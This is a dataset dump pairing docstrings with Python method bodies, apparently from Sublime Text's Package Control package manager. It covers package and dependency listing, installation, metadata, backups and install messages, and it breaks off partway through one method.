desc
stringlengths 3
26.7k
| decl
stringlengths 11
7.89k
| bodies
stringlengths 8
553k
|
---|---|---|
'Returns the package metadata for an installed package
:param package:
The name of the package
:param is_dependency:
If the metadata is for a dependency
:return:
A dict with the keys:
version
url
description
or an empty dict on error'
| def get_metadata(self, package, is_dependency=False):
| metadata_filename = 'package-metadata.json'
if is_dependency:
metadata_filename = 'dependency-metadata.json'
if package_file_exists(package, metadata_filename):
metadata_json = read_package_file(package, metadata_filename)
if metadata_json:
try:
return json.loads(metadata_json)
except ValueError:
console_write(u'\n An error occurred while trying to parse the package\n metadata for %s.\n ', package)
return {}
|
'Returns a list of dependencies for the specified package on the
current machine
:param package:
The name of the package
:return:
A list of dependency names'
| def get_dependencies(self, package):
| if package_file_exists(package, 'dependencies.json'):
dep_info_json = read_package_file(package, 'dependencies.json')
if dep_info_json:
try:
return self.select_dependencies(json.loads(dep_info_json))
except ValueError:
console_write(u'\n An error occurred while trying to parse the\n dependencies.json for %s.\n ', package)
metadata = self.get_metadata(package)
if metadata:
return metadata.get('dependencies', [])
return []
|
'Returns the priority and loader code for a dependency that is already
on disk.
This is primarily only useful when a package author has a
dependency they are developing locally and Package Control needs to
know how to set up a loader for it.
:param dependency:
A unicode string of the dependency to get the info for
:return:
A 2-element tuple of unicode strings (priority, python code). Return
value will be (None, None) if the dependency was not found on disk.'
| def get_dependency_priority_code(self, dependency):
| dependency_path = self.get_package_dir(dependency)
if (not os.path.exists(dependency_path)):
return (None, None)
dependencies = self.list_available_dependencies()
hidden_file_path = os.path.join(dependency_path, '.sublime-dependency')
loader_py_path = os.path.join(dependency_path, 'loader.py')
loader_code_path = os.path.join(dependency_path, 'loader.code')
priority = None
if (dependency in dependencies):
priority = dependencies[dependency].get('load_order')
elif os.path.exists(hidden_file_path):
with open(hidden_file_path, 'rb') as f:
data = f.read().decode('utf-8').strip()
if data.isdigit():
priority = data
if (len(priority) == 1):
priority = ('0' + priority)
if (priority is None):
priority = '50'
code = None
is_py_loader = os.path.exists(loader_py_path)
is_code_loader = os.path.exists(loader_code_path)
if (is_py_loader or is_code_loader):
loader_path = (loader_code_path if is_code_loader else loader_py_path)
with open(loader_path, 'rb') as f:
code = f.read().decode('utf-8')
return (priority, code)
|
':param package:
The package name
:return:
If the package is installed via git'
| def _is_git_package(self, package):
| git_dir = os.path.join(self.get_package_dir(package), '.git')
return (os.path.exists(git_dir) and (os.path.isdir(git_dir) or os.path.isfile(git_dir)))
|
':param package:
The package name
:return:
If the package is installed via hg'
| def _is_hg_package(self, package):
| hg_dir = os.path.join(self.get_package_dir(package), '.hg')
return (os.path.exists(hg_dir) and os.path.isdir(hg_dir))
|
'If the package is installed via git or hg
:param package:
The package to check
:return:
bool'
| def is_vcs_package(self, package):
| return (self._is_git_package(package) or self._is_hg_package(package))
|
'Determines the current version for a package
:param package:
The package name'
| def get_version(self, package):
| version = self.get_metadata(package).get('version')
if version:
return version
if self.is_vcs_package(package):
upgrader = self.instantiate_upgrader(package)
version = upgrader.latest_commit()
if version:
return ('%s commit %s' % (upgrader.cli_name, version))
return 'unknown version'
|
'Creates an HgUpgrader or GitUpgrader object to run operations on a VCS-
based package
:param package:
The name of the package
:return:
GitUpgrader, HgUpgrader or None'
| def instantiate_upgrader(self, package):
| if self._is_git_package(package):
return GitUpgrader(self.settings['git_binary'], self.settings['git_update_command'], self.get_package_dir(package), self.settings['cache_length'], self.settings['debug'])
if self._is_hg_package(package):
return HgUpgrader(self.settings['hg_binary'], self.settings['hg_update_command'], self.get_package_dir(package), self.settings['cache_length'], self.settings['debug'])
return None
|
'Takes the a dict from a dependencies.json file and returns the
dependency names that are applicable to the current machine
:param dependency_info:
A dict from a dependencies.json file
:return:
A list of dependency names'
| def select_dependencies(self, dependency_info):
| platform_selectors = [((self.settings['platform'] + '-') + self.settings['arch']), self.settings['platform'], '*']
for platform_selector in platform_selectors:
if (platform_selector not in dependency_info):
continue
platform_dependency = dependency_info[platform_selector]
versions = platform_dependency.keys()
for version_selector in sorted(versions, reverse=True):
if (not is_compatible_version(version_selector)):
continue
return platform_dependency[version_selector]
return []
|
'Returns a master list of all repositories pulled from all sources
These repositories come from the channels specified in the
"channels" setting, plus any repositories listed in the
"repositories" setting.
:return:
A list of all available repositories'
| def list_repositories(self):
| cache_ttl = self.settings.get('cache_length')
repositories = self.settings.get('repositories')[:]
channels = self.settings.get('channels')
updated_channels = []
found_default = False
for channel in channels:
if re.match('https?://([^.]+\\.)*package-control.io', channel):
console_write(('Removed malicious channel %s' % channel))
continue
if (channel in OLD_DEFAULT_CHANNELS):
if (not found_default):
updated_channels.append(DEFAULT_CHANNEL)
found_default = True
continue
updated_channels.append(channel)
for channel in updated_channels:
channel = channel.strip()
cache_key = (channel + '.repositories')
channel_repositories = get_cache(cache_key)
merge_cache_under_settings(self, 'package_name_map', channel)
merge_cache_under_settings(self, 'renamed_packages', channel)
merge_cache_under_settings(self, 'unavailable_packages', channel, list_=True)
merge_cache_under_settings(self, 'unavailable_dependencies', channel, list_=True)
if (channel_repositories is None):
for provider_class in CHANNEL_PROVIDERS:
if provider_class.match_url(channel):
provider = provider_class(channel, self.settings)
break
try:
channel_repositories = provider.get_repositories()
set_cache(cache_key, channel_repositories, cache_ttl)
unavailable_packages = []
unavailable_dependencies = []
for repo in channel_repositories:
original_packages = provider.get_packages(repo)
filtered_packages = {}
for package in original_packages:
info = original_packages[package]
info['releases'] = filter_releases(package, self.settings, info['releases'])
if info['releases']:
filtered_packages[package] = info
else:
unavailable_packages.append(package)
packages_cache_key = (repo + '.packages')
set_cache(packages_cache_key, filtered_packages, cache_ttl)
original_dependencies = provider.get_dependencies(repo)
filtered_dependencies = {}
for dependency in original_dependencies:
info = original_dependencies[dependency]
info['releases'] = filter_releases(dependency, self.settings, info['releases'])
if info['releases']:
filtered_dependencies[dependency] = info
else:
unavailable_dependencies.append(dependency)
dependencies_cache_key = (repo + '.dependencies')
set_cache(dependencies_cache_key, filtered_dependencies, cache_ttl)
name_map = provider.get_name_map()
set_cache_under_settings(self, 'package_name_map', channel, name_map, cache_ttl)
renamed_packages = provider.get_renamed_packages()
set_cache_under_settings(self, 'renamed_packages', channel, renamed_packages, cache_ttl)
set_cache_under_settings(self, 'unavailable_packages', channel, unavailable_packages, cache_ttl, list_=True)
set_cache_under_settings(self, 'unavailable_dependencies', channel, unavailable_dependencies, cache_ttl, list_=True)
except (DownloaderException, ClientException, ProviderException) as e:
console_write(e)
continue
repositories.extend(channel_repositories)
return [repo.strip() for repo in repositories]
|
'Returns a master list of every available package and dependency from all sources
:return:
A 2-element tuple, in the format:
\'Package Name\': {
# Package details - see example-repository.json for format
\'Dependency Name\': {
# Dependency details - see example-repository.json for format'
| def _list_available(self):
| if self.settings.get('debug'):
console_write(u'\n Fetching list of available packages and dependencies\n Platform: %s-%s\n Sublime Text Version: %s\n Package Control Version: %s\n ', (self.settings['platform'], self.settings['arch'], self.settings['version'], __version__))
cache_ttl = self.settings.get('cache_length')
repositories = self.list_repositories()
packages = {}
dependencies = {}
bg_downloaders = {}
active = []
repos_to_download = []
name_map = self.settings.get('package_name_map', {})
for repo in repositories[::(-1)]:
if re.match('https?://([^.]+\\.)*package-control.io', repo):
console_write(('Removed malicious repository %s' % repo))
continue
cache_key = (repo + '.packages')
repository_packages = get_cache(cache_key)
if (repository_packages is not None):
packages.update(repository_packages)
cache_key = (repo + '.dependencies')
repository_dependencies = get_cache(cache_key)
dependencies.update(repository_dependencies)
else:
domain = urlparse(repo).hostname
if (domain not in bg_downloaders):
bg_downloaders[domain] = BackgroundDownloader(self.settings, REPOSITORY_PROVIDERS)
bg_downloaders[domain].add_url(repo)
repos_to_download.append(repo)
for bg_downloader in list(bg_downloaders.values()):
bg_downloader.start()
active.append(bg_downloader)
while active:
bg_downloader = active.pop()
bg_downloader.join()
for repo in repos_to_download:
domain = urlparse(repo).hostname
bg_downloader = bg_downloaders[domain]
provider = bg_downloader.get_provider(repo)
if (not provider):
continue
unavailable_packages = []
unavailable_dependencies = []
repository_packages = {}
for (name, info) in provider.get_packages():
name = name_map.get(name, name)
info['name'] = name
info['releases'] = filter_releases(name, self.settings, info['releases'])
if info['releases']:
repository_packages[name] = info
else:
unavailable_packages.append(name)
repository_dependencies = {}
for (name, info) in provider.get_dependencies():
info['releases'] = filter_releases(name, self.settings, info['releases'])
if info['releases']:
repository_dependencies[name] = info
else:
unavailable_dependencies.append(name)
for (url, exception) in provider.get_failed_sources():
console_write(exception)
for (name, exception) in provider.get_broken_packages():
console_write(exception)
for (name, exception) in provider.get_broken_dependencies():
console_write(exception)
cache_key = (repo + '.packages')
set_cache(cache_key, repository_packages, cache_ttl)
packages.update(repository_packages)
cache_key = (repo + '.dependencies')
set_cache(cache_key, repository_dependencies, cache_ttl)
dependencies.update(repository_dependencies)
renamed_packages = provider.get_renamed_packages()
set_cache_under_settings(self, 'renamed_packages', repo, renamed_packages, cache_ttl)
set_cache_under_settings(self, 'unavailable_packages', repo, unavailable_packages, cache_ttl, list_=True)
set_cache_under_settings(self, 'unavailable_dependencies', repo, unavailable_dependencies, cache_ttl, list_=True)
return (packages, dependencies)
|
'Returns a master list of every available dependency from all sources
:return:
A dict in the format:
\'Dependency Name\': {
# Dependency details - see example-repository.json for format'
| def list_available_dependencies(self):
| return self._list_available()[1]
|
'Returns a master list of every available package from all sources
:return:
A dict in the format:
\'Package Name\': {
# Package details - see example-repository.json for format'
| def list_available_packages(self):
| return self._list_available()[0]
|
':param unpacked_only:
Only list packages that are not inside of .sublime-package files
:return: A list of all installed, non-default, non-dependency, package names'
| def list_packages(self, unpacked_only=False):
| packages = self._list_visible_dirs(self.settings['packages_path'])
if ((self.settings['version'] > 3000) and (unpacked_only is False)):
packages |= self._list_sublime_package_files(self.settings['installed_packages_path'])
packages -= set(self.list_default_packages())
packages -= set(self.list_dependencies())
packages -= set(['User', 'Default'])
return sorted(packages, key=(lambda s: s.lower()))
|
':return: A list of all installed dependency names'
| def list_dependencies(self):
| output = []
if (sys.version_info >= (3,)):
output.append('0_package_control_loader')
for name in self._list_visible_dirs(self.settings['packages_path']):
if (not self._is_dependency(name)):
continue
output.append(name)
return sorted(output, key=(lambda s: s.lower()))
|
':return:
A list of the names of dependencies in the Packages/ folder that
are not currently being loaded'
| def list_unloaded_dependencies(self):
| output = []
for name in self._list_visible_dirs(self.settings['packages_path']):
hidden_file_path = os.path.join(self.settings['packages_path'], name, '.sublime-dependency')
if (not os.path.exists(hidden_file_path)):
continue
if (not loader.exists(name)):
output.append(name)
return output
|
'Lists all packages on the machine
:return:
A list of all installed package names, including default packages'
| def list_all_packages(self):
| packages = (self.list_default_packages() + self.list_packages())
return sorted(packages, key=(lambda s: s.lower()))
|
':return: A list of all default package names'
| def list_default_packages(self):
| if (self.settings['version'] > 3000):
app_dir = os.path.dirname(sublime.executable_path())
packages = self._list_sublime_package_files(os.path.join(app_dir, 'Packages'))
else:
config_dir = os.path.dirname(self.settings['packages_path'])
pristine_dir = os.path.join(config_dir, 'Pristine Packages')
pristine_files = self._list_sublime_package_files(pristine_dir)
installed_dir = self.settings['installed_packages_path']
installed_files = self._list_sublime_package_files(installed_dir)
packages = (pristine_files - installed_files)
packages -= set(['User', 'Default'])
return sorted(packages, key=(lambda s: s.lower()))
|
'Return a set of directories in the folder specified that are not
hidden and are not marked to be removed
:param path:
The folder to list the directories inside of
:return:
A set of directory names'
| def _list_visible_dirs(self, path):
| output = set()
for filename in os.listdir(path):
if (filename[0] == '.'):
continue
file_path = os.path.join(path, filename)
if (not os.path.isdir(file_path)):
continue
if os.path.exists(os.path.join(file_path, 'package-control.cleanup')):
continue
output.add(filename)
return output
|
'Return a set of all .sublime-package files in a folder
:param path:
The directory to look in for .sublime-package files
:return:
A set of the package names - i.e. with the .sublime-package suffix removed'
| def _list_sublime_package_files(self, path):
| output = set()
if (not os.path.exists(path)):
return output
for filename in os.listdir(path):
if (not re.search('\\.sublime-package$', filename)):
continue
output.add(filename.replace('.sublime-package', ''))
return output
|
'Checks if a package specified is a dependency
:param name:
The name of the package to check if it is a dependency
:return:
Bool, if the package is a dependency'
| def _is_dependency(self, name):
| metadata_path = os.path.join(self.settings['packages_path'], name, 'dependency-metadata.json')
hidden_path = os.path.join(self.settings['packages_path'], name, '.sublime-dependency')
return (os.path.exists(metadata_path) or os.path.exists(hidden_path))
|
'Find all of the dependencies required by the installed packages,
ignoring the specified package.
:param ignore_package:
The package to ignore when enumerating dependencies
:return:
A list of the dependencies required by the installed packages'
| def find_required_dependencies(self, ignore_package=None):
| output = ['0_package_control_loader']
for package in self.list_packages():
if (package == ignore_package):
continue
output.extend(self.get_dependencies(package))
for name in self._list_visible_dirs(self.settings['packages_path']):
metadata_path = os.path.join(self.settings['packages_path'], name, 'dependency-metadata.json')
hidden_path = os.path.join(self.settings['packages_path'], name, '.sublime-dependency')
metadata_exists = os.path.exists(metadata_path)
hidden_exists = os.path.exists(hidden_path)
if (metadata_exists or (not hidden_exists)):
continue
output.append(name)
output = list(set(output))
return sorted(output, key=(lambda s: s.lower()))
|
':return: The full filesystem path to the package directory'
| def get_package_dir(self, package):
| return os.path.join(self.settings['packages_path'], package)
|
':return: The name of the package after passing through mapping rules'
| def get_mapped_name(self, package):
| return self.settings.get('package_name_map', {}).get(package, package)
|
'Creates a .sublime-package file from the running Packages directory
:param package_name:
The package to create a .sublime-package file for
:param package_destination:
The full filesystem path of the directory to save the new
.sublime-package file in.
:param profile:
If None, the "dirs_to_ignore", "files_to_ignore", "files_to_include"
and "package_destination" settings will be used when creating the
package. If a string, will look in the "package_profiles" setting
and use the profile name to select a sub-dictionary which may
contain all of the ignore/include settings.
:return: bool if the package file was successfully created'
| def create_package(self, package_name, package_destination, profile=None):
| package_dir = self.get_package_dir(package_name)
if (not os.path.exists(package_dir)):
show_error(u'\n The folder for the package name specified, %s,\n does not exists in %s\n ', (package_name, self.settings['packages_path']))
return False
package_filename = (package_name + '.sublime-package')
package_path = os.path.join(package_destination, package_filename)
if (not os.path.exists(self.settings['installed_packages_path'])):
os.mkdir(self.settings['installed_packages_path'])
if os.path.exists(package_path):
os.remove(package_path)
try:
package_file = zipfile.ZipFile(package_path, 'w', compression=zipfile.ZIP_DEFLATED)
except (OSError, IOError) as e:
show_error(u'\n An error occurred creating the package file %s in %s.\n\n %s\n ', (package_filename, package_destination, unicode_from_os(e)))
return False
if (self.settings['version'] >= 3000):
compileall.compile_dir(package_dir, quiet=True, legacy=True, optimize=2)
if profile:
profile_settings = self.settings.get('package_profiles').get(profile)
def get_profile_setting(setting, default):
if profile:
profile_value = profile_settings.get(setting)
if (profile_value is not None):
return profile_value
return self.settings.get(setting, default)
dirs_to_ignore = get_profile_setting('dirs_to_ignore', [])
files_to_ignore = get_profile_setting('files_to_ignore', [])
files_to_include = get_profile_setting('files_to_include', [])
slash = ('\\' if (os.name == 'nt') else '/')
trailing_package_dir = ((package_dir + slash) if (package_dir[(-1)] != slash) else package_dir)
package_dir_regex = re.compile(('^' + re.escape(trailing_package_dir)))
for (root, dirs, files) in os.walk(package_dir):
dirs[:] = [x for x in dirs if (x not in dirs_to_ignore)]
paths = dirs
paths.extend(files)
for path in paths:
full_path = os.path.join(root, path)
relative_path = re.sub(package_dir_regex, '', full_path)
ignore_matches = [fnmatch(relative_path, p) for p in files_to_ignore]
include_matches = [fnmatch(relative_path, p) for p in files_to_include]
if (any(ignore_matches) and (not any(include_matches))):
continue
if os.path.isdir(full_path):
continue
package_file.write(full_path, relative_path)
package_file.close()
return True
|
'Downloads and installs (or upgrades) a package
Uses the self.list_available_packages() method to determine where to
retrieve the package file from.
The install process consists of:
1. Finding the package
2. Downloading the .sublime-package/.zip file
3. Extracting the package file
4. Showing install/upgrade messaging
5. Submitting usage info
6. Recording that the package is installed
:param package_name:
The package to download and install
:param is_dependency:
If the package is a dependency
:return: bool if the package was successfully installed or None
if the package needs to be cleaned up on the next restart
and should not be reenabled'
| def install_package(self, package_name, is_dependency=False):
| if is_dependency:
packages = self.list_available_dependencies()
else:
packages = self.list_available_packages()
is_available = (package_name in list(packages.keys()))
unavailable_key = 'unavailable_packages'
if is_dependency:
unavailable_key = 'unavailable_dependencies'
is_unavailable = (package_name in self.settings.get(unavailable_key, []))
package_type = 'package'
if is_dependency:
package_type = 'dependency'
if (is_unavailable and (not is_available)):
console_write(u'\n The %s "%s" is either not available on this platform or for\n this version of Sublime Text\n ', (package_type, package_name))
if is_dependency:
return True
return False
if (not is_available):
message = u"The %s '%s' is not available"
params = (package_type, package_name)
if is_dependency:
console_write(message, params)
else:
show_error(message, params)
return False
release = packages[package_name]['releases'][0]
have_installed_dependencies = False
if (not is_dependency):
dependencies = release.get('dependencies', [])
if dependencies:
if (not self.install_dependencies(dependencies)):
return False
have_installed_dependencies = True
url = release['url']
package_filename = (package_name + '.sublime-package')
tmp_dir = tempfile.mkdtemp(u'')
try:
package_zip = None
tmp_package_path = os.path.join(tmp_dir, package_filename)
unpacked_package_dir = self.get_package_dir(package_name)
package_path = os.path.join(self.settings['installed_packages_path'], package_filename)
pristine_package_path = os.path.join(os.path.dirname(self.settings['packages_path']), 'Pristine Packages', package_filename)
if self.is_vcs_package(package_name):
upgrader = self.instantiate_upgrader(package_name)
to_ignore = self.settings.get('ignore_vcs_packages')
if (to_ignore is True):
show_error(u'\n Skipping %s package %s since the setting\n "ignore_vcs_packages" is set to true\n ', (upgrader.cli_name, package_name))
return False
if (isinstance(to_ignore, list) and (package_name in to_ignore)):
show_error(u'\n Skipping %s package %s since it is listed in the\n "ignore_vcs_packages" setting\n ', (upgrader.cli_name, package_name))
return False
result = upgrader.run()
if ((result is True) and is_dependency):
(load_order, loader_code) = self.get_dependency_priority_code(package_name)
loader.add_or_update(load_order, package_name, loader_code)
return result
old_version = self.get_metadata(package_name, is_dependency=is_dependency).get('version')
is_upgrade = (old_version is not None)
try:
with downloader(url, self.settings) as manager:
package_bytes = manager.fetch(url, 'Error downloading package.')
except DownloaderException as e:
console_write(e)
show_error(u'\n Unable to download %s. Please view the console for\n more details.\n ', package_name)
return False
with open_compat(tmp_package_path, 'wb') as package_file:
package_file.write(package_bytes)
try:
package_zip = zipfile.ZipFile(tmp_package_path, 'r')
except zipfile.BadZipfile:
show_error(u'\n An error occurred while trying to unzip the package file\n for %s. Please try installing the package again.\n ', package_name)
return False
root_level_paths = []
last_path = None
for path in package_zip.namelist():
try:
if (not isinstance(path, str_cls)):
path = path.decode('utf-8', 'strict')
except UnicodeDecodeError:
console_write(u'\n One or more of the zip file entries in %s is not\n encoded using UTF-8, aborting\n ', package_name)
return False
last_path = path
if (path.find('/') in [(len(path) - 1), (-1)]):
root_level_paths.append(path)
if ((path[0] == '/') or (path.find('../') != (-1)) or (path.find('..\\') != (-1))):
show_error(u'\n The package specified, %s, contains files outside of\n the package dir and cannot be safely installed.\n ', package_name)
return False
if (last_path and (len(root_level_paths) == 0)):
root_level_paths.append(last_path[0:(last_path.find('/') + 1)])
skip_root_dir = ((len(root_level_paths) == 1) and root_level_paths[0].endswith('/'))
dependencies_path = 'dependencies.json'
no_package_file_zip_path = '.no-sublime-package'
if skip_root_dir:
dependencies_path = (root_level_paths[0] + dependencies_path)
no_package_file_zip_path = (root_level_paths[0] + no_package_file_zip_path)
unpack = True
if (self.settings['version'] >= 3000):
unpack = False
try:
package_zip.getinfo(no_package_file_zip_path)
unpack = True
except KeyError:
pass
if is_dependency:
unpack = True
if ((not is_dependency) and (not have_installed_dependencies)):
try:
dep_info_json = package_zip.read(dependencies_path)
try:
dep_info = json.loads(dep_info_json.decode('utf-8'))
except ValueError:
console_write(u'\n An error occurred while trying to parse the\n dependencies.json for %s.\n ', package_name)
return False
dependencies = self.select_dependencies(dep_info)
if (not self.install_dependencies(dependencies)):
return False
except KeyError:
pass
metadata_filename = 'package-metadata.json'
if is_dependency:
metadata_filename = 'dependency-metadata.json'
unpacked_metadata_file = os.path.join(unpacked_package_dir, metadata_filename)
if (os.path.exists(unpacked_metadata_file) and (not unpack)):
self.backup_package_dir(package_name)
if (not clear_directory(unpacked_package_dir)):
reinstall_file = os.path.join(unpacked_package_dir, 'package-control.reinstall')
open_compat(reinstall_file, 'w').close()
clear_directory(unpacked_package_dir, [reinstall_file, unpacked_metadata_file])
show_error(u'\n An error occurred while trying to upgrade %s. Please\n restart Sublime Text to finish the upgrade.\n ', package_name)
return None
else:
os.rmdir(unpacked_package_dir)
if unpack:
self.backup_package_dir(package_name)
package_dir = unpacked_package_dir
else:
tmp_working_dir = os.path.join(tmp_dir, 'working')
os.mkdir(tmp_working_dir)
package_dir = tmp_working_dir
package_metadata_file = os.path.join(package_dir, metadata_filename)
if (not os.path.exists(package_dir)):
os.mkdir(package_dir)
os.chdir(package_dir)
loader_code = None
overwrite_failed = False
extracted_paths = []
for path in package_zip.namelist():
dest = path
try:
if (not isinstance(dest, str_cls)):
dest = dest.decode('utf-8', 'strict')
except UnicodeDecodeError:
console_write(u'\n One or more of the zip file entries in %s is not\n encoded using UTF-8, aborting\n ', package_name)
return False
if (os.name == 'nt'):
regex = ':|\\*|\\?|"|<|>|\\|'
if (re.search(regex, dest) is not None):
console_write(u'\n Skipping file from package named %s due to an\n invalid filename\n ', package_name)
continue
if skip_root_dir:
dest = dest[len(root_level_paths[0]):]
if (os.name == 'nt'):
dest = dest.replace('/', '\\')
else:
dest = dest.replace('\\', '/')
if (is_dependency and (dest in set(['loader.code', 'loader.py']))):
loader_code = package_zip.read(path).decode('utf-8')
if (dest == 'loader.py'):
continue
dest = os.path.join(package_dir, dest)
def add_extracted_dirs(dir_):
while (dir_ not in extracted_paths):
extracted_paths.append(dir_)
dir_ = os.path.dirname(dir_)
if (dir_ == package_dir):
break
if path.endswith('/'):
if (not os.path.exists(dest)):
os.makedirs(dest)
add_extracted_dirs(dest)
else:
dest_dir = os.path.dirname(dest)
if (not os.path.exists(dest_dir)):
os.makedirs(dest_dir)
add_extracted_dirs(dest_dir)
extracted_paths.append(dest)
try:
with open_compat(dest, 'wb') as f:
f.write(package_zip.read(path))
except IOError as e:
message = unicode_from_os(e)
if re.search('[Ee]rrno 13', message):
overwrite_failed = True
break
console_write(u'\n Skipping file from package named %s due to an\n invalid filename\n ', package_name)
except UnicodeDecodeError:
console_write(u'\n Skipping file from package named %s due to an\n invalid filename\n ', package_name)
package_zip.close()
package_zip = None
if overwrite_failed:
reinstall_file = os.path.join(package_dir, 'package-control.reinstall')
open_compat(reinstall_file, 'w').close()
clear_directory(package_dir, [reinstall_file, package_metadata_file])
show_error(u'\n An error occurred while trying to upgrade %s. Please restart\n Sublime Text to finish the upgrade.\n ', package_name)
return None
clear_directory(package_dir, extracted_paths)
new_version = release['version']
self.print_messages(package_name, package_dir, is_upgrade, old_version, new_version)
with open_compat(package_metadata_file, 'w') as f:
if is_dependency:
url = packages[package_name]['issues']
else:
url = packages[package_name]['homepage']
metadata = {'version': new_version, 'sublime_text': release['sublime_text'], 'platforms': release['platforms'], 'url': url, 'description': packages[package_name]['description']}
if (not is_dependency):
metadata['dependencies'] = release.get('dependencies', [])
json.dump(metadata, f)
if is_upgrade:
params = {'package': package_name, 'operation': 'upgrade', 'version': new_version, 'old_version': old_version}
else:
params = {'package': package_name, 'operation': 'install', 'version': new_version}
self.record_usage(params)
if (not is_dependency):
def save_names():
settings = sublime.load_settings(pc_settings_filename())
original_names = load_list_setting(settings, 'installed_packages')
names = list(original_names)
if (package_name not in names):
names.append(package_name)
save_list_setting(settings, pc_settings_filename(), 'installed_packages', names, original_names)
sublime.set_timeout(save_names, 1)
else:
load_order = packages[package_name]['load_order']
loader.add_or_update(load_order, package_name, loader_code)
if (not unpack):
try:
os.remove(tmp_package_path)
package_zip = zipfile.ZipFile(tmp_package_path, 'w', compression=zipfile.ZIP_DEFLATED)
except (OSError, IOError) as e:
show_error(u'\n An error occurred creating the package file %s in %s.\n\n %s\n ', (package_filename, tmp_dir, unicode_from_os(e)))
return False
package_dir_regex = re.compile(('^' + re.escape(package_dir)))
for (root, dirs, files) in os.walk(package_dir):
paths = dirs
paths.extend(files)
for path in paths:
full_path = os.path.join(root, path)
relative_path = re.sub(package_dir_regex, '', full_path)
if os.path.isdir(full_path):
continue
package_zip.write(full_path, relative_path)
package_zip.close()
package_zip = None
try:
if os.path.exists(package_path):
os.remove(package_path)
shutil.move(tmp_package_path, package_path)
except OSError:
new_package_path = package_path.replace('.sublime-package', '.sublime-package-new')
shutil.move(tmp_package_path, new_package_path)
show_error(u'\n An error occurred while trying to upgrade %s. Please restart\n Sublime Text to finish the upgrade.\n ', package_name)
return None
if os.path.exists(pristine_package_path):
os.remove(pristine_package_path)
os.chdir(self.settings['packages_path'])
return True
finally:
if package_zip:
package_zip.close()
sublime.set_timeout((lambda : delete_directory(tmp_dir)), 1000)
|
'Ensures a list of dependencies are installed and up-to-date
:param dependencies:
A list of dependency names
:return:
A boolean indicating if the dependencies are properly installed'
| def install_dependencies(self, dependencies, fail_early=True):
| debug = self.settings.get('debug')
packages = self.list_available_dependencies()
error = False
for dependency in dependencies:
if (dependency == '0_package_control_loader'):
continue
dependency_dir = os.path.join(self.settings['packages_path'], dependency)
dependency_git_dir = os.path.join(dependency_dir, '.git')
dependency_hg_dir = os.path.join(dependency_dir, '.hg')
dependency_metadata = self.get_metadata(dependency, is_dependency=True)
dependency_releases = packages.get(dependency, {}).get('releases', [])
dependency_release = (dependency_releases[0] if dependency_releases else {})
installed_version = dependency_metadata.get('version')
installed_version = (version_comparable(installed_version) if installed_version else None)
available_version = dependency_release.get('version')
available_version = (version_comparable(available_version) if available_version else None)
def dependency_write(msg):
msg = (u"The dependency '{dependency}' " + msg)
msg = msg.format(dependency=dependency, installed_version=installed_version, available_version=available_version)
console_write(msg)
def dependency_write_debug(msg):
if debug:
dependency_write(msg)
install_dependency = False
if (not os.path.exists(dependency_dir)):
install_dependency = True
dependency_write(u'is not currently installed; installing...')
elif os.path.exists(dependency_git_dir):
dependency_write_debug(u'is installed via git; leaving alone')
elif os.path.exists(dependency_hg_dir):
dependency_write_debug(u'is installed via hg; leaving alone')
elif (not dependency_metadata):
dependency_write_debug(u'appears to be installed, but is missing metadata; leaving alone')
elif (not dependency_releases):
dependency_write(u'is installed, but there are no available releases; leaving alone')
elif (not available_version):
dependency_write(u'is installed, but the latest available release could not be determined; leaving alone')
elif (not installed_version):
install_dependency = True
dependency_write(u'is installed, but its version is not known; upgrading to latest release {available_version}...')
elif (installed_version < available_version):
install_dependency = True
dependency_write(u'is installed, but out of date; upgrading to latest release {available_version} from {installed_version}...')
else:
dependency_write_debug(u'is installed and up to date ({installed_version}); leaving alone')
if install_dependency:
dependency_result = self.install_package(dependency, True)
if (not dependency_result):
dependency_write(u'could not be installed or updated')
if fail_early:
return False
error = True
else:
dependency_write(u'has successfully been installed or updated')
return (not error)
|
'Remove all not needed dependencies by the installed packages,
ignoring the specified package.
:param ignore_package:
The package to ignore when enumerating dependencies.
Not used when required_dependencies is provided.
:param required_dependencies:
All required dependencies, for speedup purposes.
:return:
Boolean indicating the success of the removals.'
| def cleanup_dependencies(self, ignore_package=None, required_dependencies=None):
| installed_dependencies = self.list_dependencies()
if (not required_dependencies):
required_dependencies = self.find_required_dependencies(ignore_package)
orphaned_dependencies = (set(installed_dependencies) - set(required_dependencies))
orphaned_dependencies = sorted(orphaned_dependencies, key=(lambda s: s.lower()))
error = False
for dependency in orphaned_dependencies:
if self.remove_package(dependency, is_dependency=True):
console_write(u'\n The orphaned dependency %s has been removed\n ', dependency)
else:
error = True
return (not error)
|
'Does a full backup of the Packages/{package}/ dir to Backup/
:param package_name:
The name of the package to back up
:return:
If the backup succeeded'
| def backup_package_dir(self, package_name):
| package_dir = os.path.join(self.settings['packages_path'], package_name)
if (not os.path.exists(package_dir)):
return True
try:
backup_dir = os.path.join(os.path.dirname(self.settings['packages_path']), 'Backup', datetime.datetime.now().strftime('%Y%m%d%H%M%S'))
if (not os.path.exists(backup_dir)):
os.makedirs(backup_dir)
package_backup_dir = os.path.join(backup_dir, package_name)
if os.path.exists(package_backup_dir):
console_write(u'\n Backup folder "%s" already exists!\n ', package_backup_dir)
shutil.copytree(package_dir, package_backup_dir)
return True
except (OSError, IOError) as e:
show_error(u'\n An error occurred while trying to backup the package directory\n for %s.\n\n %s\n ', (package_name, unicode_from_os(e)))
try:
if os.path.exists(package_backup_dir):
delete_directory(package_backup_dir)
except UnboundLocalError:
pass
return False
|
'Prints out package install and upgrade messages
The functionality provided by this allows package maintainers to
show messages to the user when a package is installed, or when
certain version upgrade occur.
:param package:
The name of the package the message is for
:param package_dir:
The full filesystem path to the package directory
:param is_upgrade:
If the install was actually an upgrade
:param old_version:
The string version of the package before the upgrade occurred
:param new_version:
The new (string) version of the package'
| def print_messages(self, package, package_dir, is_upgrade, old_version, new_version):
| messages_file = os.path.join(package_dir, 'messages.json')
if (not os.path.exists(messages_file)):
return
messages_fp = open_compat(messages_file, 'r')
try:
message_info = json.loads(read_compat(messages_fp))
except ValueError:
console_write(u'\n Error parsing messages.json for %s\n ', package)
return
messages_fp.close()
def read_message(message_path):
with open_compat(message_path, 'r') as f:
return ('\n %s\n' % read_compat(f).rstrip().replace('\n', '\n '))
output = ''
if ((not is_upgrade) and message_info.get('install')):
try:
install_file = message_info.get('install')
install_path = os.path.join(package_dir, install_file)
output += read_message(install_path)
except FileNotFoundError:
console_write(u'\n Error opening install message for %s from %s\n ', (package, install_file))
elif (is_upgrade and old_version):
upgrade_messages = list((set(message_info.keys()) - set(['install'])))
upgrade_messages = version_sort(upgrade_messages, reverse=True)
old_version_cmp = version_comparable(old_version)
new_version_cmp = version_comparable(new_version)
for version in upgrade_messages:
version_cmp = version_comparable(version)
